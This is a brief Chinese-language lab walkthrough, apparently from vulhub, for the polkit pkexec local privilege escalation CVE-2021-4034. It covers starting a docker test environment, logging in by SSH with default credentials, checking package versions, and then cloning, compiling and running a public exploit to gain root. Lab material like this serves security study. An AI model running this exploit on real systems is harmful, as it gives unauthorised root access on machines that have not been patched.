Polkit(之前名为PolicyKit)是一个权限相关的套件,pkexec是其中用于以其他用户身份执行命令的工具,它具有suid权限。
当前版本的pkexec中没有正确处理参数和环境变量,导致攻击者可以利用这个Bug劫持环境变量GCONV_PATH
,进而劫持动态链接库,以root身份执行任意代码。
高危
Path:/vulhub/polkit/CVE-2021-4034
启动测试环境:
sudo docker-compose up -d
首先,使用ubuntu/vulhub
作为账号密码登录目标的SSH(端口是2222):
ssh ubuntu@<your-ip> -p2222
此工具是linux系统预装工具,所有存在此工具的linux系统都会收到影响
判断是否有这个漏洞:
dpkg -l policykit-1 #debain,ubuntu
rpm -qai policykit-1 #centos,redhat
利用
git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034/
make
./cve-2021-4034